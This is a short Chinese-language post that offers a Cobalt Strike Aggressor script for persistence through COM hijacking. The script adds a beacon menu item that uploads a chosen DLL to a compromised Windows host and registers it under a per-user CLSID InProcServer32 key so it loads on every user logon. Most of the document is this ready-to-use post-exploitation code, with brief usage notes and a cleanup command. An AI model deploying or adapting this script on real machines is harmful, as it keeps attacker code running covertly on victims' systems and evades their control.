COM劫持利用脚本编写

一个简单的通过com劫持达到持久化的一个脚本

sub Show_COM_GUI{
$bid = $1;
$dialog = dialog("COM劫持用户登陆", %(), 
lambda({
    bupload($bid, $3['file']);
    bmv($bid,$3['DLL_NAME'],$3['DLL_PATH'])
    bpowerpick($bid,'Remove-Item "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}" -Recurse');
    bpowerpick($bid,'New-Item -Type Directory "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}"');
    #brun($bid,"reg add \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /t REG_SZ /d \"".$3['DLL_PATH'].$3['DLL_NAME']"\" /f")
    bpowerpick($bid,"New-Item -itemType String 'HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32' -Value  \"".$3['DLL_PATH'].$3['DLL_NAME']"\" ");
    bpowerpick($bid,'Set-ItemProperty "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}\InProcServer32"  -name ThreadingModel -value Both');

}));
dialog_description($dialog, "劫持任意用户登陆，任意用户登陆时将触发DLL. x64位用x64 dll,x86位用x86 dll。清除劫持:Remove-Item \"HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\\" -Recurse");
drow_file($dialog, "file", "本地DLL路径: ");
drow_text($dialog, "DLL_NAME", "DLL文件名:  ");
drow_text($dialog, "DLL_PATH", "上传路径+DLL文件名:  ");
dbutton_action($dialog, "Go");
dialog_show($dialog);
}

popup beacon_bottom {
    item "&COM持久化" {
        local('$bid');
        foreach $bid ($1) {
            Show_COM_GUI($bid);
        }

    }
}

通过com劫持任意用户登陆达到持久化，每当有用户登陆时就会触发dll。x32位系统使用x32位dll，x64位用x64位dll。